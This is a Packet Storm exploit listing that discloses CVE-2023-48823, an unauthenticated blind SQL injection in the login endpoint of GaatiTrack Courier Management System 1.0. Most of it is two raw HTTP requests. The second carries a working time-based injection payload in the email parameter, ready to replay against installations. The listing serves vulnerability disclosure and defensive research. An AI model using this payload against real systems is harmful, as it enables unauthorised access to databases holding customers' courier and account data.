what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

GaatiTrack Courier Management System 1.0 SQL Injection

GaatiTrack Courier Management System 1.0 SQL Injection
Posted Dec 4, 2023
Authored by Rahad Chowdhury, BugsBD Limited

GaatiTrack Courier Management System version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2023-48823
SHA-256 | d32a123df3242fd37fdc4dbf8ce84ed24bef9916821cba9ffa99148bfc157e28
Download | Favorite | View

GaatiTrack Courier Management System 1.0 SQL Injection

Change Mirror Download
# Exploit Title: GaatiTrack Courier Management System v1.0 - SQL Injection
# Date: 13/11/2023
# Exploit Author: BugsBD Limited
# Discover by: Rahad Chowdhury
# Vendor Homepage: https://www.mayurik.com/
# Software Link:
https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php
# Version: v1.0
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56
# CVE: CVE-2023-48823

Descriptions:
Blind SQL injection in ajax.php in GaatiTrack Courier Management
System v1.0 allows an unauthenticated attacker to insert malicious SQL
queries via email parameter.


Steps to Reproduce:

1. Request:

POST /gaatitrack/ajax.php?action=login HTTP/1.1
Host: 192.168.1.74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Origin: http://192.168.1.74
Connection: close
Referer: http://192.168.1.74/gaatitrack/login.php
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;
KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;
KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc

email=test%40test.com&password=123456

2. Now use blind sqli query after email parameter. So your request data will be:

POST /gaatitrack/ajax.php?action=login HTTP/1.1
Host: 192.168.1.74
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Origin: http://192.168.1.74
Connection: close
Referer: http://192.168.1.74/gaatitrack/login.php
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp;
KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;
KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhc

email=test%40test.com'XOR(if(now()=sysdate()%2Csleep(4)%2C0))XOR'&password=123456

## Reproduce:
[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48823)
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    0 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close